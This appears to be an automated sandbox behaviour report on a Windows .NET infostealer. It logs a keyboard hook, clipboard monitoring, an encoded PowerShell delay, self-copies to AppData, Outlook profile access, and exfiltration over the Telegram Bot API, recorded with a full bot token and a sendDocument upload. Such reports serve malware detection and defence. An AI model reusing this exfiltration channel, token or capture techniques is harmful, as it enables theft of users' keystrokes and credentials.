                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: kDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.s
                Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org4
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknownHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Users\user\Desktop\file.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\file.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E4A800_2_056E4A80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E23690_2_056E2369
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E23780_2_056E2378
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E4A720_2_056E4A72
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E152F0_2_056E152F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0123C9784_2_0123C978
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0123A9B84_2_0123A9B8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01239DA04_2_01239DA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0123A0E84_2_0123A0E8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_069808704_2_06980870
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_069855C04_2_069855C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0698C8AC4_2_0698C8AC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C462104_2_06C46210
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C430A84_2_06C430A8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C48E184_2_06C48E18
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C423704_2_06C42370
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C4237C4_2_06C4237C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C430804_2_06C43080
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C430004_2_06C43000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C4CD994_2_06C4CD99
                Source: file.exe, 00000000.00000002.385810798.0000000002D14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.388743810.0000000003D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000003.372912348.00000000055E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000000.00000002.385810798.0000000002C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.388743810.0000000003CC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000000.305756685.0000000000840000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
                Source: file.exe, 00000004.00000002.609344708.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
                Source: file.exe, 00000004.00000003.389929403.00000000066CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000004.00000002.608064863.0000000000D68000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exeReversingLabs: Detection: 35%
                Source: file.exeVirustotal: Detection: 44%
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\UwztwjweucJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\CdFileMgrJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/15@8/3
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: file.exeStatic file information: File size 1825280 > 1048576
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1bd000
